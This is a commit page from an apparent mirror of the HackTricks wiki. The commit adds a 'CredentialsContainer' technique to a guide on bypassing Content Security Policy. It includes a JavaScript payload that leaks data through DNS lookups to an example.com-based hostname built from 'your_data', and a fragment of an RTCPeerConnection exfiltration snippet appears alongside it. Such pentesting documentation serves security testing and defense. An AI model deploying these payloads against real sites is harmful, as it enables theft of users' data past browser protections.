maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1005 from satoki/master

Browse Source 
Add CSP Exfiltration Bypass Technic by CredentialsContainer
This commit is contained in:
SirBroccoli 2025-01-26 16:13:47 +01:00 committed by GitHub
commit cfa9c5d271
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
src/pentesting-web/content-security-policy-csp-bypass/README.md
View File

@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp); pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
``` ```
### CredentialsContainer
The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
```javascript
navigator.credentials.store(
new FederatedCredential({
id:"satoki",
name:"satoki",
provider:"https:"+your_data+"example.com",
iconURL:"https:"+your_data+"example.com"
})
)
```
## Checking CSP Policies Online ## Checking CSP Policies Online
- [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)